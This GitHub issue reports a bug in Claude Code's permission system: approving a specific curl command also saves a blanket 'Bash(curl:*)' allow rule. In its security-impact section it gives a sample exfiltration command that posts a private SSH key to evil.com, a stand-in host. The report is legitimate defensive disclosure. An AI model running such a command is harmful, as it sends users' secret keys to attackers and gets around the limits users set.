Permission system saves wildcard Bash(curl:*) instead of specific command pattern
Bug Description
When approving a specific curl command via the permission prompt (e.g., "Always allow"), the system saves Bash(curl:*) to settings.local.json instead of the specific command pattern the user intended to approve.
Steps to Reproduce
- Remove
Bash(curl:*)from bothsettings.jsonandsettings.local.json - Trigger a curl command (e.g.,
curl -s -X POST http://<internal-ip>:3101/call ...) - When prompted, select "Always allow" to pre-approve future calls matching this pattern
- Check
settings.local.json
Expected Behavior
The specific command pattern should be saved, e.g.:
"Bash(curl -s -X POST http://<internal-ip>:3101:*)"
Or at minimum, the pattern the user selected in the approval dialog should be what gets persisted.
Actual Behavior
The wildcard Bash(curl:*) is appended to the allow list, which auto-approves ALL curl commands regardless of destination. This defeats the purpose of scoped permissions.
In my case, three specific curl commands to a known IP were correctly saved, but a subsequent approval also added the blanket wildcard:
"Bash(curl -s -X POST http://<internal-ip>:3101/call ...)", // specific - correct
"Bash(curl -s -X POST http://<internal-ip>:3101/call ...)", // specific - correct
"Bash(curl -s -X POST http://<internal-ip>:3101/call ...)", // specific - correct
"Bash(curl:*)" // wildcard - BUG
Security Impact
This is a security concern because Bash(curl:*) allows data exfiltration to arbitrary external servers (e.g., curl -X POST https://evil.com -d "$(cat ~/.ssh/id_rsa)"). Users who intentionally restrict curl to specific IPs/hosts for prompt injection defense are unknowingly having their restrictions bypassed.
Environment
- Claude Code CLI (terminal, not IDE)
- Platform: Linux (WSL2)
- The bug reproduced 3 times in a single session — each time I removed the wildcard and re-approved a specific curl command, the wildcard came back
Workaround
Manually edit settings.local.json after each curl approval to remove the Bash(curl:*) entry. This is tedious and error-prone.
This issue has 3 comments on GitHub. Read the full discussion on GitHub ↗